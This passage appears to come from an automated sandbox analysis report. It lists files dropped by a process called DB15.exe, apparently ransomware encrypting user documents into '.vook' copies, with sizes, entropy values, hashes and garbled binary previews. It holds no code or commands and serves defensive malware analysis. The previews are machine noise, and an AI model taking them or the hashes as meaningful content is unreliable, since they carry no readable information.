                                                                                                                                                                                                                                      Preview:ZQIXM..F.+..#X..EX?U.m.....T.T........._M.w.>..^<?.....w.....Uv.(..0f...@<.....I..dgi..|..WA..*.+..L....h.p.'..b.f97+(.....1.~.^.Q...l1..c......L..C..vD?T...t...<I.N..M.t.5I..18....9.....h..T..Rlv=.!P.F..N../..YV.@*...t.?..=].X...k._..W..%.X .,5....H..\...QZ8.9.p.J.w..c.V..rKs.-_.P.....@..!...,j.....vR.. s....r...u......]...R.. M.......S9...a.k...t..>..*..Y.eJ.M..$..^...Z..R0.ot.a.|..2....}A...,l..,wSu.....E..$.....*.f>.2.....H\.J.....2....x..}..5..I.i..Mv...vF.0.6.h..&[T.4sK./V.{.......W4.....s....z.+t..=....._.{M}.hu.s...K.#.[=.R.<..[j..U....U.."\...+U..I.1....T..."8q {O...r..w... s.....L7....v...W.oz ].h,....p@.......^.D..:....^..y[.T..G..[QR...........Q.lW...-&._..{.x.....q..<.R.)...Gy....R. .k..`.....P....]F..D..5......A.J.w.K..p...lo.S;.1.=..{7..>P...@Hx..X.B..M.?F...*.....,..K|...q./E.x.@..w<JT..hu$...`&..... ]6.......>...ph..(.l.<..!......%G.4..J.]?..4..^........k..~...u.PJU?.....c.1..'.D..,}..A>.^4BN..d.0..\..E....&.$;.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851617862214594
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1S0iI1vrAsJZzvLb/WgVbN2f1MfM+8vyiB1jKOTwadq6G3VHBA3HiiTkbD:o0ZzHX/VVGSEjaqfQVHBaHXiD
                                                                                                                                                                                                                                      MD5:2A959354C4FEE82FDBD9AD38DC19DF3B
                                                                                                                                                                                                                                      SHA1:16E67F9CFCEA41AF1AD1E62F1EB5F678F104EF96
                                                                                                                                                                                                                                      SHA-256:D8561F3BAB40A4BAD1CF5FE7352B44651A5EDFD2FF8D8143F4ABB6DF7560EF0E
                                                                                                                                                                                                                                      SHA-512:A25B2BB1D77DB612C8A78DF3654D04A1D4E04CB5B71AB0DB000E2A165ED0EC24D452CEE71C30D76AB297BB1F59D3070F711C879275EE38C51A33088717CB41C9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM..F.+..#X..EX?U.m.....T.T........._M.w.>..^<?.....w.....Uv.(..0f...@<.....I..dgi..|..WA..*.+..L....h.p.'..b.f97+(.....1.~.^.Q...l1..c......L..C..vD?T...t...<I.N..M.t.5I..18....9.....h..T..Rlv=.!P.F..N../..YV.@*...t.?..=].X...k._..W..%.X .,5....H..\...QZ8.9.p.J.w..c.V..rKs.-_.P.....@..!...,j.....vR.. s....r...u......]...R.. M.......S9...a.k...t..>..*..Y.eJ.M..$..^...Z..R0.ot.a.|..2....}A...,l..,wSu.....E..$.....*.f>.2.....H\.J.....2....x..}..5..I.i..Mv...vF.0.6.h..&[T.4sK./V.{.......W4.....s....z.+t..=....._.{M}.hu.s...K.#.[=.R.<..[j..U....U.."\...+U..I.1....T..."8q {O...r..w... s.....L7....v...W.oz ].h,....p@.......^.D..:....^..y[.T..G..[QR...........Q.lW...-&._..{.x.....q..<.R.)...Gy....R. .k..`.....P....]F..D..5......A.J.w.K..p...lo.S;.1.=..{7..>P...@Hx..X.B..M.?F...*.....,..K|...q./E.x.@..w<JT..hu$...`&..... ]6.......>...ph..(.l.<..!......%G.4..J.]?..4..^........k..~...u.PJU?.....c.1..'.D..,}..A>.^4BN..d.0..\..E....&.$;.

                                                                                                                                                                                                                                      C:\Users\user\Documents\BNAGMGSPLO.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843663085649462
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:SSS1EYLQIDxTg3dq0Hy7WLCCw6IDsxPyMCCNJd2pgc4OfK4X/dQIrS83y4fi/iTW:SSTm3DxT+H+WdQzQJd2ychPdvPGaiD
                                                                                                                                                                                                                                      MD5:FDF2A8389279A19F59512B4714F4AF55
                                                                                                                                                                                                                                      SHA1:57AC4AA238E02170B5D2DB60797E51359885356A
                                                                                                                                                                                                                                      SHA-256:47197C7982ED6C651DAFEBCA8AF0272B115ECF31705703B8367BADDCB464250C
                                                                                                                                                                                                                                      SHA-512:C581DC9F2AEE1899F9C27A5FACD93066D8347258269C95E3940A6BA705AC6BEDF79EBFC60EE622B8F1FB7C08DBC54514D4525BD668C9B5D65CF3CC6A59FD0C78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.4lc.U0^......XVJf..!.W.Bt.`...Z....d...n..\Tx%.2..e]~5...Fn..3.XS.Ea@RZ./.kBV.=........G.Fs.....YY......T..~.l_..!].y.._.......~P4.H.9.[...`....0.b(...+j!.V...m..b'.A^......"..N.?y.].fz2'>......r..Ly.#.....B..9'{h!gu...C..[.RK.3.|\./.C..,.Zj<.....u$.www.@..H.1.[...&D.&....+...../.=9..&E./.pY.R...v...t..T.yrT......Gr.z}.*u."P]4F..Y..en..j.u.....>...E..]%./...S..@..T..Z ..^&x@..gz....[v.1&...M/0..H..'....P.~..g...).......#'.E?.{&.4......&EN.L.af2I.'*..2L..d.bC.i.q<.....Xgh9mET...c..L.....i......0...I"%cG....Joa.......Ny..A..{..,cT....:.z|..coQ.V....k>.dh.. .....(.....'R.2......e......J^.>V.oN...4a..4..R...k.....f.9.......7.!h...G....@.p....a........H.Be....Ev.C...U..->\F.4.......O0Ub.s]@...@.C>.U.](A.n./.+).........\....g.[...........2B?u.d..$.. .f.P....Q.k.i...f..lY..2.@(......:..p....J9^_4....I..#P.].....Y.....0.x/+....P...{1P..'L([..9....%..ph..../.!....>.58..sF....}.}.r`>.X.qN..Y.4...*I....'8..n:..[."A?ig.2.U.M...(.3..........Wv

                                                                                                                                                                                                                                      C:\Users\user\Documents\BNAGMGSPLO.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843663085649462
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:SSS1EYLQIDxTg3dq0Hy7WLCCw6IDsxPyMCCNJd2pgc4OfK4X/dQIrS83y4fi/iTW:SSTm3DxT+H+WdQzQJd2ychPdvPGaiD
                                                                                                                                                                                                                                      MD5:FDF2A8389279A19F59512B4714F4AF55
                                                                                                                                                                                                                                      SHA1:57AC4AA238E02170B5D2DB60797E51359885356A
                                                                                                                                                                                                                                      SHA-256:47197C7982ED6C651DAFEBCA8AF0272B115ECF31705703B8367BADDCB464250C
                                                                                                                                                                                                                                      SHA-512:C581DC9F2AEE1899F9C27A5FACD93066D8347258269C95E3940A6BA705AC6BEDF79EBFC60EE622B8F1FB7C08DBC54514D4525BD668C9B5D65CF3CC6A59FD0C78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.4lc.U0^......XVJf..!.W.Bt.`...Z....d...n..\Tx%.2..e]~5...Fn..3.XS.Ea@RZ./.kBV.=........G.Fs.....YY......T..~.l_..!].y.._.......~P4.H.9.[...`....0.b(...+j!.V...m..b'.A^......"..N.?y.].fz2'>......r..Ly.#.....B..9'{h!gu...C..[.RK.3.|\./.C..,.Zj<.....u$.www.@..H.1.[...&D.&....+...../.=9..&E./.pY.R...v...t..T.yrT......Gr.z}.*u."P]4F..Y..en..j.u.....>...E..]%./...S..@..T..Z ..^&x@..gz....[v.1&...M/0..H..'....P.~..g...).......#'.E?.{&.4......&EN.L.af2I.'*..2L..d.bC.i.q<.....Xgh9mET...c..L.....i......0...I"%cG....Joa.......Ny..A..{..,cT....:.z|..coQ.V....k>.dh.. .....(.....'R.2......e......J^.>V.oN...4a..4..R...k.....f.9.......7.!h...G....@.p....a........H.Be....Ev.C...U..->\F.4.......O0Ub.s]@...@.C>.U.](A.n./.+).........\....g.[...........2B?u.d..$.. .f.P....Q.k.i...f..lY..2.@(......:..p....J9^_4....I..#P.].....Y.....0.x/+....P...{1P..'L([..9....%..ph..../.!....>.58..sF....}.}.r`>.X.qN..Y.4...*I....'8..n:..[."A?ig.2.U.M...(.3..........Wv

                                                                                                                                                                                                                                      C:\Users\user\Documents\EOWRVPQCCS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852114746779472
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:BNlHf6Tmd4yJsX4CL+LMVLc7HJxrCb202eOsj2TLGUdZR2RJ/bjhWcDwL9iTkbD:BNlHf6QJSGAVLc7HJtCb2Qj23GUR2XTQ
                                                                                                                                                                                                                                      MD5:2111C05ACE7C63136D493F9D92E709E6
                                                                                                                                                                                                                                      SHA1:66E42929F933D9B4DCE2E44689D793DD798CE678
                                                                                                                                                                                                                                      SHA-256:86BB300863173ED24FE6B64BE415B4A6B994DB550E12CFC33476E57520029293
                                                                                                                                                                                                                                      SHA-512:C177D0BA082072179AAEE8A56903CA7A464EE78CFFCCE3544E5AAB5B3C7A51E933D334AA664F258B994A79FE9AFC15AE5C2EB1CFD17632E0F2EBFB1A1F759E9F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..r.d.5[..3..A......j...J`..d..}...=.)...L.N(.B)26.#..{ .th3..../......J..n ...}.l....r....^..........'r..6[.c.}.."x..v..3..CQ..V.G...2.....EO.5D'...,.6F.%k...G...6....}./NR%T.*.x.....1.z..DK..W8(h.7..#d.k..So.....:yX.R.6...m......{.......I.0.....z..h....."]s.P.}......XK.B.d.1h.........eC....?B...f..M..g..O..X...U................).:....l-s.a,~.L...$vO.e..b.w...Y.m..t.u/2.2..\.u.l.F.j..a.......L.[.Q.K7CB{..(..f.....j..\\.F..;.......V.(........H.S.x..dgB.(.9h......{...s.I.MIX.;.d\.G..=.......oo.*3}.........0......u}.`.hH...q.E....eg.E.Kf.3.-.-#v...#...Br/....R];j....E..Iz.U8.jO...io..=.I.'.....h.ag.+.>.p..S.v.....k...Y.v.........9&.[.q.K.:..y......^:P.p..*P......_...ZJ..5.N.R.I.aDyb.W....?Uu?..Hjj.S7w.I&s...o.........k.*.d+....................p..;.o$.>lB.$*.u..hCa(....Z.yf..?G...z..|.N.;........N2H....&J.A...".%.^t.2....v.#....tY.*0|.iE}..D#....._.W.,9...^AlJ....`.I?h{eB...S,..91.2..y..)t..M....Y...X...$L.Y....\.....A.W......tn..vY:....dn

                                                                                                                                                                                                                                      C:\Users\user\Documents\EOWRVPQCCS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852114746779472
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:BNlHf6Tmd4yJsX4CL+LMVLc7HJxrCb202eOsj2TLGUdZR2RJ/bjhWcDwL9iTkbD:BNlHf6QJSGAVLc7HJtCb2Qj23GUR2XTQ
                                                                                                                                                                                                                                      MD5:2111C05ACE7C63136D493F9D92E709E6
                                                                                                                                                                                                                                      SHA1:66E42929F933D9B4DCE2E44689D793DD798CE678
                                                                                                                                                                                                                                      SHA-256:86BB300863173ED24FE6B64BE415B4A6B994DB550E12CFC33476E57520029293
                                                                                                                                                                                                                                      SHA-512:C177D0BA082072179AAEE8A56903CA7A464EE78CFFCCE3544E5AAB5B3C7A51E933D334AA664F258B994A79FE9AFC15AE5C2EB1CFD17632E0F2EBFB1A1F759E9F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..r.d.5[..3..A......j...J`..d..}...=.)...L.N(.B)26.#..{ .th3..../......J..n ...}.l....r....^..........'r..6[.c.}.."x..v..3..CQ..V.G...2.....EO.5D'...,.6F.%k...G...6....}./NR%T.*.x.....1.z..DK..W8(h.7..#d.k..So.....:yX.R.6...m......{.......I.0.....z..h....."]s.P.}......XK.B.d.1h.........eC....?B...f..M..g..O..X...U................).:....l-s.a,~.L...$vO.e..b.w...Y.m..t.u/2.2..\.u.l.F.j..a.......L.[.Q.K7CB{..(..f.....j..\\.F..;.......V.(........H.S.x..dgB.(.9h......{...s.I.MIX.;.d\.G..=.......oo.*3}.........0......u}.`.hH...q.E....eg.E.Kf.3.-.-#v...#...Br/....R];j....E..Iz.U8.jO...io..=.I.'.....h.ag.+.>.p..S.v.....k...Y.v.........9&.[.q.K.:..y......^:P.p..*P......_...ZJ..5.N.R.I.aDyb.W....?Uu?..Hjj.S7w.I&s...o.........k.*.d+....................p..;.o$.>lB.$*.u..hCa(....Z.yf..?G...z..|.N.;........N2H....&J.A...".%.^t.2....v.#....tY.*0|.iE}..D#....._.W.,9...^AlJ....`.I?h{eB...S,..91.2..y..)t..M....Y...X...$L.Y....\.....A.W......tn..vY:....dn

                                                                                                                                                                                                                                      C:\Users\user\Documents\GAOBCVIQIJ.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861811334033443
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1BwTyCHJkWPGLkblvgegT7gepS0Tvxky1UwMacHElMpUAM0IyYVeKoB3vJqfF7+j:EGCpjOLkblvgbgepS2qyqwMackz0jYwb
                                                                                                                                                                                                                                      MD5:23FE3A176A10C265B99424ABD0FEA2A6
                                                                                                                                                                                                                                      SHA1:55AAB5147C3F677D14B5934959CC2CC309258142
                                                                                                                                                                                                                                      SHA-256:D1DEE28C31FB7DA59A6B3BBAA7F79C0F79A7B69ACFBCF13158F78D5481F1E902
                                                                                                                                                                                                                                      SHA-512:81FA716C2EF5D092B5CC5AF600F4B2254130D8FFA7F25E7F56C1BE9E47098C8F64E734052EFD2FEC3D8ECED1E4D5AFBD4B1814365155B623EE4C1B2B06CBFD57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.".....7..$.)....U....TF..d......,]I\.&........'.X}.....L#.........;.;..^..).C<\R...fA...jK...I.1..B....e.,.o..5...........s..q.2...?.]rH..o...k.t...[...=P...wE@'.E....g..`.V...^B.S...b.s./.V...l~...?U^....IRM....9"vr..+....lUQ.._.5....<..~.n..D.Y.W.Oj(H........m.)..wi.h..*Q~....`,..#..0a{.G....K...ro8....[oNE.-.n.1..;..q.iB.42.o....S.;...N...|@..n.&...O.<:.,Z........9...5`1.....Y9......D..p.?...(.-.t...pa.rX.....F.zk.D.a4I...j.k.p....)S......2..7"k.c.y.#)L+4\..hi....8.X....M....0-x...+.C....S..e.-As.Z.,.A.3x.%..._..*2....7..4bQ.,.[.~.%..U#A.@'.v..&.P.^N..-.J[...C..D..2gs...A|......C..~.g^..!S.!..Y.YI"nC.s......K.a.......\)Dv........g...;.m....e.~RVdI.w:cQe..d.K.|.A.a\..t7.A.........iQ`6..w..+o....F..P]..Bu&/B9..x}f.s....c..st.....}........lA.....r.K_3.Q4.ZJ.ut_...........z.K~H........h.8...)\..D.j.?.*.a...]D;...#......c,.0...0......g.1......ZD...i>>...`#>.TC.."@...e.m.t..".. .T.~..=6..K151:.....q.6..7d.).cqh...~..g/.R.[.M<_G33"@*..9O..a

                                                                                                                                                                                                                                      C:\Users\user\Documents\GAOBCVIQIJ.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861811334033443
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1BwTyCHJkWPGLkblvgegT7gepS0Tvxky1UwMacHElMpUAM0IyYVeKoB3vJqfF7+j:EGCpjOLkblvgbgepS2qyqwMackz0jYwb
                                                                                                                                                                                                                                      MD5:23FE3A176A10C265B99424ABD0FEA2A6
                                                                                                                                                                                                                                      SHA1:55AAB5147C3F677D14B5934959CC2CC309258142
                                                                                                                                                                                                                                      SHA-256:D1DEE28C31FB7DA59A6B3BBAA7F79C0F79A7B69ACFBCF13158F78D5481F1E902
                                                                                                                                                                                                                                      SHA-512:81FA716C2EF5D092B5CC5AF600F4B2254130D8FFA7F25E7F56C1BE9E47098C8F64E734052EFD2FEC3D8ECED1E4D5AFBD4B1814365155B623EE4C1B2B06CBFD57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.".....7..$.)....U....TF..d......,]I\.&........'.X}.....L#.........;.;..^..).C<\R...fA...jK...I.1..B....e.,.o..5...........s..q.2...?.]rH..o...k.t...[...=P...wE@'.E....g..`.V...^B.S...b.s./.V...l~...?U^....IRM....9"vr..+....lUQ.._.5....<..~.n..D.Y.W.Oj(H........m.)..wi.h..*Q~....`,..#..0a{.G....K...ro8....[oNE.-.n.1..;..q.iB.42.o....S.;...N...|@..n.&...O.<:.,Z........9...5`1.....Y9......D..p.?...(.-.t...pa.rX.....F.zk.D.a4I...j.k.p....)S......2..7"k.c.y.#)L+4\..hi....8.X....M....0-x...+.C....S..e.-As.Z.,.A.3x.%..._..*2....7..4bQ.,.[.~.%..U#A.@'.v..&.P.^N..-.J[...C..D..2gs...A|......C..~.g^..!S.!..Y.YI"nC.s......K.a.......\)Dv........g...;.m....e.~RVdI.w:cQe..d.K.|.A.a\..t7.A.........iQ`6..w..+o....F..P]..Bu&/B9..x}f.s....c..st.....}........lA.....r.K_3.Q4.ZJ.ut_...........z.K~H........h.8...)\..D.j.?.*.a...]D;...#......c,.0...0......g.1......ZD...i>>...`#>.TC.."@...e.m.t..".. .T.~..=6..K151:.....q.6..7d.).cqh...~..g/.R.[.M<_G33"@*..9O..a

                                                                                                                                                                                                                                      C:\Users\user\Documents\GRXZDKKVDB.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.847756508971997
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:btw8tXFpmQWT/8BgeCbQgIcMm9jQQ83Hb+mWZxsZA2m0HmBA4gO/QC62xqRpojiq:beK1pVWTMgeCb5IVQ8Xb+tZC5GpgtSxb
                                                                                                                                                                                                                                      MD5:E8A983CAF5F1572DECFAA479EFE74CCC
                                                                                                                                                                                                                                      SHA1:78D4E41E00BFCAF39DAAA7CCED6BDEF5122605D1
                                                                                                                                                                                                                                      SHA-256:EA70D58D1A5118DA07CD509911FB46C32A23F6AB8C961AA7EA5B059C0D591940
                                                                                                                                                                                                                                      SHA-512:33CD395A272597A50DC3D37C3F381BF02C439F6F31E627572830379C282701FF51C82F2D350145F29096DA2E2ECFEC7FF74C8C203D55374F038C6325C0580CD8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZDR...x*rD......H..G0.....!.I.j....N.A.....Li?<.....5m.......Jc.....f.?.{v9)J......a..=f....../#.Z...7!V..............[.ih.B.r..H...R....^^GJ_...]Q^...d!....,.N..2%.K|......iuR...h....M.v.n.h\. ..}5........*}.L..x..CN<.K.~:.gC.$.*........ .z.._I....uL<.g..h..x8..4....l...%[sw.O.M.e.S+97...,.F...!...iwF.%..m..\1..m..v....../..w.......p.[{......._.gi....i..<....f{..4..._m.r..*......@.)U1....[.+#v...m^.2....Y...].%z.K.u....:.h..v.....Q$........d...*FB..)..W......\.4..{..dD.E!..H...!.[z..:#.;.7(Pt.2o..;Y.c.+..*....D.*V...8..\L.e.....>..?.......a....h..G.....g...N........H...Y0...^%...;....omx.W...!........!. ...`....~9......GK..E}i.V,[.#.Xz.A.C.....}.GZd.3...7:OW.w....b....m......\..H.PcX..W.+{<H.B}.z....R..w.......r.f5s..3[/5.....-~.UZ)\..8S..f.%W.bA..S.Xg...&.9.........n..k.f...X[i...".....{8f.......o...I.j..2......J.E...F.....S... KP..^*.....)....+l]...j..)B.[.k..5.]ZU.-u.>)C.]... ..)...............}..?....r..Z.=.%....J8BPf...a.E.X.u...q|%

                                                                                                                                                                                                                                      C:\Users\user\Documents\GRXZDKKVDB.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.847756508971997
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:btw8tXFpmQWT/8BgeCbQgIcMm9jQQ83Hb+mWZxsZA2m0HmBA4gO/QC62xqRpojiq:beK1pVWTMgeCb5IVQ8Xb+tZC5GpgtSxb
                                                                                                                                                                                                                                      MD5:E8A983CAF5F1572DECFAA479EFE74CCC
                                                                                                                                                                                                                                      SHA1:78D4E41E00BFCAF39DAAA7CCED6BDEF5122605D1
                                                                                                                                                                                                                                      SHA-256:EA70D58D1A5118DA07CD509911FB46C32A23F6AB8C961AA7EA5B059C0D591940
                                                                                                                                                                                                                                      SHA-512:33CD395A272597A50DC3D37C3F381BF02C439F6F31E627572830379C282701FF51C82F2D350145F29096DA2E2ECFEC7FF74C8C203D55374F038C6325C0580CD8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZDR...x*rD......H..G0.....!.I.j....N.A.....Li?<.....5m.......Jc.....f.?.{v9)J......a..=f....../#.Z...7!V..............[.ih.B.r..H...R....^^GJ_...]Q^...d!....,.N..2%.K|......iuR...h....M.v.n.h\. ..}5........*}.L..x..CN<.K.~:.gC.$.*........ .z.._I....uL<.g..h..x8..4....l...%[sw.O.M.e.S+97...,.F...!...iwF.%..m..\1..m..v....../..w.......p.[{......._.gi....i..<....f{..4..._m.r..*......@.)U1....[.+#v...m^.2....Y...].%z.K.u....:.h..v.....Q$........d...*FB..)..W......\.4..{..dD.E!..H...!.[z..:#.;.7(Pt.2o..;Y.c.+..*....D.*V...8..\L.e.....>..?.......a....h..G.....g...N........H...Y0...^%...;....omx.W...!........!. ...`....~9......GK..E}i.V,[.#.Xz.A.C.....}.GZd.3...7:OW.w....b....m......\..H.PcX..W.+{<H.B}.z....R..w.......r.f5s..3[/5.....-~.UZ)\..8S..f.%W.bA..S.Xg...&.9.........n..k.f...X[i...".....{8f.......o...I.j..2......J.E...F.....S... KP..^*.....)....+l]...j..)B.[.k..5.]ZU.-u.>)C.]... ..)...............}..?....r..Z.=.%....J8BPf...a.E.X.u...q|%

                                                                                                                                                                                                                                      C:\Users\user\Documents\IPKGELNTQY.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858615102452004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:G7D9v5JIOnadfKbr2cydjkFQB4+gNZlbm5YiVtvjaI8/SIx/rdUf8QiTkbD:Sx5OhC2cytsULgNHevWDpRrd+8hiD
                                                                                                                                                                                                                                      MD5:FDB891AD6437009E5A05E17DE8096A33
                                                                                                                                                                                                                                      SHA1:9D8F758FF72BFDEB7F6F7F59F1F67CB442671A04
                                                                                                                                                                                                                                      SHA-256:F183C1B06C0834E3023249FED27B384612A922EECE77468AC774ECD3F7D014FF
                                                                                                                                                                                                                                      SHA-512:67173976DA56D0DA0DDDE10855E9B4DD15C1142C619389F2C7887BB0CA2897F32BEC7F91DA797DF40F7B5271AC378465CD30DA9320070033DA487877C951BF8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGEt!.....:.o{$:.......}OO%..0..I....7.6.....YM...a......g.....p...'@......`....5n..]..h.....\.u./....}.........(..3[K...7M.....}.m_......DsA. ..^.@7-...[f.{....................UA.. ......e.....ex.....<.Mv.$).@y....y.z..;..`..6%.s7..h.2.~........?.I.S.s..>l...o......S...F...eU....F..QDp.r.L...n.........E..f....D..f..;../..4.....Q...n...g.....#7g....^..U.^.L..@dZ8g+. ..:$h...z.c.p.....uk.u*.&..@..,.>-X.f!awr....#.6..l...l...$2'sF..dG.gJ..^.>.hv.mZ..a....&J.......s|.(....n.%..O.52...q.).<D..6.0...J"y.Rj....h.Q...,*..H..W........^...'J...-.d.\..m...Ejlk..^..*..V..8.....H..u{cl.D.y.......:N.....@w..lj{.l.^.....3,...h..u....Xp.T'.D..OZ@..........'...Rd....v../..$..a......1.e..,V.T.H..."E.bo2..A.}....A.\.G.. ...G..K.0....n....tBo..%.q.8s....8..E=(....B(...=dnJ..Z\.....'......{.G.~"..0._mvC..G.Y.bT~C....?.!b..."..w...]v..o.....2(z.J...G.dcJ~....e........)....Y...,.t3\...!...+.T..qf.....fYB..{.(.jO!........2+....`.2.)...]..TCF...K.i.,j.

                                                                                                                                                                                                                                      C:\Users\user\Documents\IPKGELNTQY.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858615102452004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:G7D9v5JIOnadfKbr2cydjkFQB4+gNZlbm5YiVtvjaI8/SIx/rdUf8QiTkbD:Sx5OhC2cytsULgNHevWDpRrd+8hiD
                                                                                                                                                                                                                                      MD5:FDB891AD6437009E5A05E17DE8096A33
                                                                                                                                                                                                                                      SHA1:9D8F758FF72BFDEB7F6F7F59F1F67CB442671A04
                                                                                                                                                                                                                                      SHA-256:F183C1B06C0834E3023249FED27B384612A922EECE77468AC774ECD3F7D014FF
                                                                                                                                                                                                                                      SHA-512:67173976DA56D0DA0DDDE10855E9B4DD15C1142C619389F2C7887BB0CA2897F32BEC7F91DA797DF40F7B5271AC378465CD30DA9320070033DA487877C951BF8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGEt!.....:.o{$:.......}OO%..0..I....7.6.....YM...a......g.....p...'@......`....5n..]..h.....\.u./....}.........(..3[K...7M.....}.m_......DsA. ..^.@7-...[f.{....................UA.. ......e.....ex.....<.Mv.$).@y....y.z..;..`..6%.s7..h.2.~........?.I.S.s..>l...o......S...F...eU....F..QDp.r.L...n.........E..f....D..f..;../..4.....Q...n...g.....#7g....^..U.^.L..@dZ8g+. ..:$h...z.c.p.....uk.u*.&..@..,.>-X.f!awr....#.6..l...l...$2'sF..dG.gJ..^.>.hv.mZ..a....&J.......s|.(....n.%..O.52...q.).<D..6.0...J"y.Rj....h.Q...,*..H..W........^...'J...-.d.\..m...Ejlk..^..*..V..8.....H..u{cl.D.y.......:N.....@w..lj{.l.^.....3,...h..u....Xp.T'.D..OZ@..........'...Rd....v../..$..a......1.e..,V.T.H..."E.bo2..A.}....A.\.G.. ...G..K.0....n....tBo..%.q.8s....8..E=(....B(...=dnJ..Z\.....'......{.G.~"..0._mvC..G.Y.bT~C....?.!b..."..w...]v..o.....2(z.J...G.dcJ~....e........)....Y...,.t3\...!...+.T..qf.....fYB..{.(.jO!........2+....`.2.)...]..TCF...K.i.,j.

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
